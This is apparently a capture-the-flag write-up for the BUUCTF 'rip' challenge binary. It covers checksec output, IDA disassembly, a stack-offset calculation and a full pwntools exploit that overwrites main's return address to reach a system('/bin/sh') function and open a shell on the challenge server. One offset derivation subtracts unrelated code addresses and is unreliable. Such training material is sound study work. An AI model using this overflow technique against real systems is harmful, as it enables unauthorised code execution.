rip
- 1 file
file pwn1
pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)
- 2 checksec
checksec pwn1
[*] '/home/kali/Desktop/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
没有加保护
- 3 ida F12+shift strings windows
# 查看关键词
Address Length Type String
LOAD:00000000004002A8 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:00000000004003B9 0000000A C libc.so.6
LOAD:00000000004003C3 00000005 C gets
LOAD:00000000004003C8 00000005 C puts
LOAD:00000000004003CD 00000007 C system
LOAD:00000000004003D4 00000012 C __libc_start_main
LOAD:00000000004003E6 0000000C C GLIBC_2.2.5
LOAD:00000000004003F2 0000000F C __gmon_start__
.rodata:0000000000402004 0000000D C please input
.rodata:0000000000402011 0000000A C ok,bye!!!
.rodata:000000000040201B 00000008 C /bin/sh
.eh_frame:00000000004020DF 00000006 C ;*3$"
gets() 函数除了遇到换行/结束符才停止外,对输入长度没有任何限制,因此存在栈溢出
存在 fun() 函数,其内部直接调用 system("/bin/sh")
; Attributes: bp-based frame;
public fun
fun proc near                 ; fun(): calls system() with the "/bin/sh" string; takes no arguments
; __unwind {
push rbp                      ; standard prologue: save caller's rbp
mov rbp, rsp                  ; bp-based frame (see Attributes above)
lea rdi, command ; "/bin/sh"  ; rdi = first argument: pointer to "/bin/sh" in .rodata (0x40201B in the strings window)
call _system                  ; system("/bin/sh")
nop
pop rbp                       ; epilogue: restore caller's rbp
retn
; } // starts at 401186
fun endp
- IDA view
.text:0000000000401142 ; __unwind {
.text:0000000000401142 push rbp
.text:0000000000401143 mov rbp, rsp
.text:0000000000401146 sub rsp, 10h
.text:000000000040114A lea rdi, s ; "please input"
.text:0000000000401151 call _puts
.text:0000000000401156 lea rax, [rbp+s]
.text:000000000040115A mov rdi, rax
.text:000000000040115D mov eax, 0
.text:0000000000401162 call _gets
.text:0000000000401167 lea rax, [rbp+s]
.text:000000000040116B mov rdi, rax ; s
.text:000000000040116E call _puts
.text:0000000000401173 lea rdi, aOkBye ; "ok,bye!!!"
.text:000000000040117A call _puts
.text:000000000040117F mov eax, 0
.text:0000000000401184 leave
.text:0000000000401185 retn
.text:0000000000401185 ; } // starts at 401142
.text:0000000000401185 main endp
.text:0000000000401185
.text:0000000000401186
.text:0000000000401186 ; =============== S U B R O U T I N E =======================================
.text:0000000000401186
.text:0000000000401186 ; Attributes: bp-based frame
.text:0000000000401186
.text:0000000000401186 public fun
.text:0000000000401186 fun proc near                 ; fun(): calls system() with the "/bin/sh" string; takes no arguments
.text:0000000000401186 ; __unwind {
.text:0000000000401186 push rbp                      ; standard prologue: save caller's rbp
.text:0000000000401187 mov rbp, rsp                  ; bp-based frame (see Attributes above)
.text:000000000040118A lea rdi, command ; "/bin/sh"  ; rdi = first argument: pointer to "/bin/sh" in .rodata (0x40201B in the strings window)
.text:0000000000401191 call _system                  ; system("/bin/sh")
.text:0000000000401196 nop
.text:0000000000401197 pop rbp                       ; epilogue: restore caller's rbp
.text:0000000000401198 retn
.text:0000000000401198 ; } // starts at 401186
.text:0000000000401198 fun endp
.text:0000000000401162 call _gets
.text:0000000000401185 retn
.text:0000000000401185 ; } // starts at 401142
.text:0000000000401186 public fun
计算偏移:1185-1162 = 23
payload = b'A' * 23 + p64(0x401186)
- 查看stack of main
-0000000000000010 db ? ; undefined
-000000000000000F s db ?
-000000000000000E db ? ; undefined
-000000000000000D db ? ; undefined
-000000000000000C db ? ; undefined
-000000000000000B db ? ; undefined
-000000000000000A db ? ; undefined
-0000000000000009 db ? ; undefined
-0000000000000008 db ? ; undefined
-0000000000000007 db ? ; undefined
-0000000000000006 db ? ; undefined
-0000000000000005 db ? ; undefined
-0000000000000004 db ? ; undefined
-0000000000000003 db ? ; undefined
-0000000000000002 db ? ; undefined
-0000000000000001 db ? ; undefined
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
从 -F 到 0 共 15 个字节,写满即可覆盖到 +0 处(保存的 rbp),再加 8 字节即可覆盖到 +8 处的返回地址 RET,从而劫持函数返回地址
payload = b'A' * (15+8) + p64(0x401186)
完整 EXP
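#!/usr/bin/python3
# coding=utf-8
# Proof-of-concept for the `rip` challenge binary (pwn1), as analysed above:
# checksec reports no canary, NX disabled and no PIE; main() reads input with
# gets() into the 15-byte buffer s at rbp-0xF; fun() at 0x401186 calls
# system("/bin/sh").  Overflowing s overwrites the saved rbp and then the
# return address of main(), so main() returns into fun().
from pwn import *

# Remote target (host/port as published for the challenge).  `port` was
# previously declared but the literal was repeated in remote(); use the
# variable so the two cannot drift apart.
host = 'node3.buuoj.cn'
port = 29566
p = remote(host, port)

# Payload layout (see the stack view of main above):
#   15 bytes -> fill the buffer s (rbp-0xF .. rbp-0x1)
#    8 bytes -> overwrite the saved rbp at +0
#    8 bytes -> overwrite the return address at +8 with the address of fun()
fun_addr = 0x401186
payload = b'a' * 15 + b'b' * 8 + p64(fun_addr)
#print(payload)
#gdb.attach(p)
p.sendline(payload)
p.interactive()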